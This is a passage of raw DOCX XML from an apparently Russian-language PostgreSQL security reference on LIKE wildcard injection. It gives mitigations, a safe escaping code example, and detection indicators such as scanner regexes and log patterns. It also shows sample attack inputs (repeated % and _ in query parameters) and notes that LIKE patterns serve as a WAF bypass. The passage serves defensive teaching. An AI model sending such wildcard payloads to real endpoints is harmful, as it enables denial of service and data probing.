        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>%</w:t>
      </w:r>
      <w:r>
        <w:t>-операторами similarity вместо LIKE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18564E91" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Для DoS-mitigation — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>trigram index</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE INDEX ... USING gin (title gin_trgm_ops)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), который превращает LIKE-search в indexed lookup; либо </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>statement_timeout</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для эндпоинта.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4210CBDF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Требования к среде.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1969FC06" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Версия PG:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> все версии (LIKE — SQL92).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F6316C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Привилегия атакующего:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> EXECUTE-доступ к эндпоинту; для DoS Variant C — без особых требований.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD2BB67" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Драйвер:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> любой — bind-параметр работает одинаково.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B6C169E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pre-condition в коде:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> user-controlled string передаётся в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LIKE :pattern</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (через bind) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>без escape pattern-символов</w:t>
      </w:r>
      <w:r>
        <w:t>. Эндпоинты с f-string в LIKE — это уже SQL injection (3.1 / 3.5), не 3.15.1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CAC67B7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Как выглядит легитимное использование.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> LIKE — стандартный fuzzy-search для коротких текстовых полей (имена, теги). Корректный pattern:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D13B9CA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>def escape_like_pattern(s: str) -&gt; str:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CB39D8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    return s.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57770DE7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5D291E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@router.get("/users/search")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49FF2157" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>async def search_users(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BAEDE58" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    q: str = Query("", min_length=2, max_length=50),  # ограничение длины</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E94CAB5"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0D315B72" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398DE826" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    if not q.strip():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="140FDB70" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        return []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F62252A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    safe_q = escape_like_pattern(q)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33388F0E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    query = text("""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD4DAEA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        SELECT id, username FROM users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FDEF9C8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        WHERE username ILIKE :pattern ESCAPE '\\'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38213F07" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        ORDER BY username LIMIT 20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7BD36B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    """)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6AB4F2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    result = await session.execute(query, {"pattern": f"{safe_q}%"})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BAC722B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # ↑ `prefix%` лучше чем `%term%` — может использовать btree-index</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A4B5B0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    return [...]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26DAE127" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Min/max length ограничивают DoS surface. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>prefix%</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> использует btree-index (если есть), что делает search O(log n) вместо O(n) sequential scan.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35FC6232" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Для production-FTS с большими таблицами — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_trgm</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> extension:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E4FF304" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE EXTENSION IF NOT EXISTS pg_trgm;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C2AB054" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE INDEX users_username_trgm_idx ON users USING gin (username gin_trgm_ops);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CBB521F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Это даёт indexed substring search с защитой от ReDoS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594A2D4D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Признаки атаки:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB8CC1A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Статический сканер</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: bind-параметр в LIKE с f-string </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{var}%</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>%{var}%</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> без сопровождающего </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>escape_like_pattern()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> call. Регэксп: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LIKE\s+:\w+</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + проверка наличия escape-функции в окрестности.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057AAEDB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`pg_stat_statements`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: запросы </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>... LIKE '%'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>... LIKE '%_____...'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (множественные underscores) — нетипичные patterns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E92BDE2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`log_min_duration_statement`</w:t>
      </w:r>
      <w:r>
        <w:t>: запросы с LIKE и длительностью &gt;&gt; 1s на эндпоинт search — DoS-индикатор.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8B5506" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HTTP access-log</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: query parameter </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>q=</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> содержит </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>%25%25%25</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>__@__</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или подряд идущие </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>%</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7249C3C8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Database-логи</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: ошибки </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>canceling statement due to statement timeout</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> от search-endpoint после payload с pattern-attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E8D28F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Версии.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Все версии PG</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LIKE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> существует с PostgreSQL 6.x (SQL92). Никакие фиксы не закрывают этот класс — application-level mis-configuration + design SQL92.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E27804" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Связанные паттерны.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7322F08A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.15.2 to_tsquery операторы</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — другой класс semantic-injection, ту же модель угроз.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E72DC17" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.15.3 websearch_to_tsquery</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — альтернатива для FTS-сценариев.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37721EDF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.3 Boolean-based blind</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — Variant B (position-matching) — это boolean-канал через row count.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3017138D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.9 Обход фильтров</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — LIKE-pattern часто используется как WAF-bypass (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>%admin%</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> не содержит обычных SQL keywords).</w:t>
      </w:r>
    </w:p>
